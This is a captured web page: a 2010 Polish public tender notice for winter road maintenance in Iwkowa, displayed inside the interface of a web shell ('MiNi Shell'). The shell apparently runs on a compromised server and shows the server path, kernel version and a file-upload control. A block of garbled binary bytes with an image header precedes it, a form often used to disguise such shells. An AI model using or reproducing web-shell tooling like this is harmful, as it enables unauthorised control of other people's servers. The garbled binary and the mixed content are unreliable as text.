JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100204/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100204/32618-N-2010.html

<p class="kh_header"><b>Iwkowa: Zimowe utrzymanie dróg gminnych w Rejonie Nr III w miejscowościach Dobrociesz,   Wojakowa, gmina Iwkowa, powiat brzeski, województwo małopolskie.</b><br>
<b>Numer ogłoszenia: 32618 - 2010; data zamieszczenia: 04.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwkowa , Iwkowa 468, 32-861 Iwkowa, woj. małopolskie, tel. 014 68-44-010, 68-44-020, faks 014 6844060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwkowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych w Rejonie Nr III w miejscowościach Dobrociesz,   Wojakowa, gmina Iwkowa, powiat brzeski, województwo małopolskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Ogólna charakterystyka przedmiotu zamówienia:
	Przedmiotem zamówienia jest zimowe utrzymanie dróg w terenie górzystym,    
            sprzętem i  materiałem będącym w dyspozycji Wykonawcy.
             Zimowe utrzymanie dróg dotyczy:
            - dokończenia sezonu zimowego 2009/2010,
            - sezon zimowy  2010/2011,

       w REJONIE NR III  o dł. 17,5 km, w miejscowościach   Dobrociesz,  Wojakowa.



      1.1  Zakres robót obejmuje:
zimowe utrzymanie dróg w Rejonie nr III poprzez odśnieżanie i likwidację gołoledzi w sposób  zapewniający ciągłość przejazdu stosownie do istniejących warunków atmosferycznych, w pierwszej kolejności dróg oznaczonych numerami od 1-7, w drugiej kolejności drogi oznaczone numerami od 8-16 oraz całodobowe patrolowanie - interwencyjne. 

Lp.	Nazwa drogi
	Osoba upoważniona do stwierdz. wykonania usługi

1	Wojakowa - Góry - Dobrociesz Granice             cała długość - do drogi                                     
                                                                               powiatowej Ujanowice	Liszka Wincenty
2	Dobrociesz - Nawsie                                            cała długość	Piotr Piechnik
3	Dobrociesz - Bagna                                              od drogi powiatowej
                                                                               do sołtysa	 Zofia Szewczyk     
4	Dobrociesz - Psiorki                                            od drogi powiatowej
                                                                              do mostu	Franciszek Czyżycki
5	Wojakowa - Słomiana                                         od drogi powiatowej 
                                                                              do krzyżówki	Jan Krzyżak
6	Wojakowa - Piechówka                                      od drogi powiatowej do        
                                                                             ostatnich zabudowań	Ryszard Kukla
7	Wojakowa - Rędziny                                          cała długość	Bronisław Czyżycki
8	Dobrociesz - Dolina                                           cała długość	Józef Pasionek
9	Wojakowa - Stawiska                                        cała długość	Krzysztof Motak
10	Wojakowa - Podgórki                                        od drogi powiatowej
                                                                            do P. Tokarskich	Maria Tokarska
11	Wojakowa - Dziołek                                          od drogi powiatowej na       
                                                                           długości 400 mb	Zdzisław Janczyk
12	Wojakowa - Gaboń                                           od drogi powiatowej na       
                                                                           długości 300 mb	Krystyna Filipek
13	Wojakowa - Podlipie                                        od drogi powiatowej na       
                                                                           długości 300 mb	Danuta Sławek
14	Wojakowa - Poczekaj                                       od drogi powiatowej 
                                                                           do zabudowań 	Wiesława Jarzmik
15	Wojakowa - Słomiana Granice                         od krzyżówki  do posesji 
                                                                            P. Bodka	Jan Bodek
16	Wojakowa - Las                                                 od drogi powiatowej 
                                                                            do posesji  P.Jajeśnicy	Leonard Jajeśnica 

    2.      Odśnieżanie i likwidację gołoledzi  należy prowadzić:
              - na polecenie Wójta Gminy, Kierownika Referatu ITK lub Inspektora ds.   
                 drogownictwa (dotyczy odśnieżania i likwidacji gołoledzi).
- bez polecenia w/w osób jeżeli luźna warstwa pokrywy śnieżnej na drodze przekracza  
   10 cm  i nadal trwają opady śniegu lub wieje wiatr sprzyjający tworzeniu się zasp (dotyczy odśnieżania),
- bez polecenia w/w osób jeżeli występuje zjawisko gołoledzi (dotyczy posypki) w szczególności na wzniesieniach, zakrętach, skrzyżowaniach, zjazdach, podjazdach, miejscach mało widocznych i innych niebezpiecznych dla ruchu odcinkach dróg.  
  
   3.  Wymagania dotyczące sprzętu:
        Zamawiający wymaga od Wykonawcy posiadania co najmniej:
         - jednego ciągnika: moc min. 52 kM, napęd min. 2 x 4 z pługiem zawieszanym czołowo    
            przygotowanym do odśnieżania,
        -  jednego ciągnika: moc min. 52 kM, napęd min. 2 x 4 przygotowanym do posypki,
        -  jeden pług wirnikowy doczepiany lub samobieżny
          Dodatkowo można zastosować - w miejscach (odcinkach) gdzie jest to możliwe -  
          samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowanym do odśnieżania lub  samochód ciężarowy: moc min. 120 kM przygotowany do posypki. 
       Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, odpowied-nio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych.
             

     4.   Wymagania dotyczące posypki:
            Posypka dróg materiałem uszorstniającym bez dodatku środków chemicznych, jedynie w szczególnych przypadkach na polecenie Zamawiającego dopuszczalne jest ich stosowanie. Pełne zabezpieczenie odpowiedniej ilości materiału do posypki wystarczającej na cały sezon zimowy jest w gestii Wykonawcy. 

     5.  Sposób potwierdzania wykonanych robót
     Osoby wymienione w pkt I ppkt 1.1 będą stwierdzać (w tzw.  raportach dnia), że  prace zosta-ły    
      wykonane zgodnie w określonym terminie.

6.	Płatności
   a)  ustala się, że faktury będą wystawiane jeden raz w miesiącu,  za wykonane roboty  
       w miesiącu poprzedzającym miesiąc wystawienia faktury, załączając do niego dokumentację  
       rozliczeniową wykonanej pracy (tzw.  raporty dnia). Zamawiający dokona zapłaty wynagrodzenia Wykonawcy wg. wystawionej  faktury w terminie do 30 dni od daty jej otrzymania.
      Dokumentacja rozliczeniowa wykonanej pracy (tzw. raport dnia), ma być przedstawiona      Zamawiającemu na każde żądanie.
   b) realizacja przedmiotu umowy do planowanej kwoty przeznaczonej w tym Rejonie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający udzieli zamówień uzupełniających w przypadku zaistnienia okoliczności o których mowa w art. 67 ust. 1 pkt 6 Pzp .
 W przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego,     
dotychczasowemu wykonawcy usług   zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, jeżeli uzna za stosowne może( nieobowiązkowo)  przedłożyć wykaz 
            wykonanych, również  wykonywanych usług  w zakresie  zimowego utrzymania  
            dróg w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres  prowadzenia działalności  jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu , dat  wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy posiadania co najmniej:
         - jednego ciągnika: moc min. 52 kM, napęd min. 2 x 4 z pługiem zawieszanym czołowo    
            przygotowanym do odśnieżania,
        -  jednego ciągnika: moc min. 52 kM, napęd min. 2 x 4 przygotowanym do posypki,
        -  jeden pług wirnikowy doczepiany lub samobieżny
         Dodatkowo można zastosować - w miejscach (odcinkach) gdzie jest to możliwe -  
         samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowa-nym   
         do odśnieżania lub  samochód ciężarowy: moc min. 120 kM przygotowany do posypki. 
         Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, 
         odpowiednio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być
         dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży opłaconą polisę, w przypadku jej braku innego dokumentu 
 potwierdzającego, że Wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności , obejmującej również zimowe utrzymanie dróg.

               VII.6 SIWZ oświadczą, że spełnią warunki określone w art. 22 ust. 1 ustawy  PZP oraz że 
                        nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy PZP.

VII.7 SIWZ  zgodnie z art. 26 ust.2 ustawy PZP załączą dokumenty wymienione w § 1 ust. 1 pkt 3, 4, 6, 10 i  w § 1 ust.2 oraz  § 2 ust. 1 pkt 1 Rozporządzenia Prezesa Rady Ministrów z dnia  30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz.U. z  2009 roku,  Nr 226, poz. 1817 ), oraz spełnią  wymogi art. 26 ust 2a, 2b, 2c  ustawy PZP. 

               VII.8 SIWZ sprawdzenie  warunków udziału w postępowaniu odbywać się będzie na podsta-wie przedłożonych dokumentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty - wg wzoru zał. nr 5 do SIWZ.
2.	Parafowany przez Wykonawcę wzór umowy -  zał. Nr 6 do  SIWZ.
3.	Pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia. 
Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie za-mówienia publicznego (art. 23 ust. 2 ustawy PZP).

IX.	SIWZ  Dokumenty wymagane w przypadku składania oferty wspólnej
  Oferta winna zawierać dokumenty określone w pkt. VIII.1.1 SIWZ, VIII 1.5  SIWZ,     
  VIII.2.1 SIWZ  dla każdego partnera  z osobna, pozostałe dokumenty składane są wspólnie .

X.	SIWZ W przypadku gdy Wykonawca zamierza powierzyć część robót podwykonawcom musi określić dokładną nazwę podwykonawcy oraz dokładny zakres robót powierzonych mu do wykonania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy  w stosunku do treści oferty, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili  zawarcia umowy.
Zamawiający określa warunki wprowadzenia wymienionych zmian tj.:
a)	zmiana nazwy Zamawiającego lub nazwy Wykonawcy,
b)	zmiana konta bankowego Wykonawcy, 
c)	zmiana osób reprezentujących, w przypadku zmian organizacyjnych,
d)	zmiana urzędowej stawki VAT,
e)	zmiany spowodowane szczególnymi warunkami atmosferycznymi,
f)	zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się, co najmniej równoważnymi upawnieniami,
g)	zmiana podwykonawcy, przy pomocy, którego Wykonawca wykonuje przedmiot umowy na innego co najmniej porównywalnym doświadcze-niem, potencjałem technicznym  i osobowym,
h)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie      z  SIWZ, 
i)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy, 
j)	zmiana terminu realizacji umowy.
k)	zmiana planowanej kwoty do przeznaczenia w tym Rejonie ( możliwość przesunięcia planowanej kwoty pomiędzy czterema Rejonami).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iwkowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Iwkowej,  32-861  Iwkowa 468,  (wejście B) -  pokój nr  12,13..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2010 godzina 09:00, miejsce: siedziba Zamawiającego - Urząd Gminy w Iwkowej,  32-861  Iwkowa 468,  (wejście A),  sekretariat 
-  pokój nr  5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com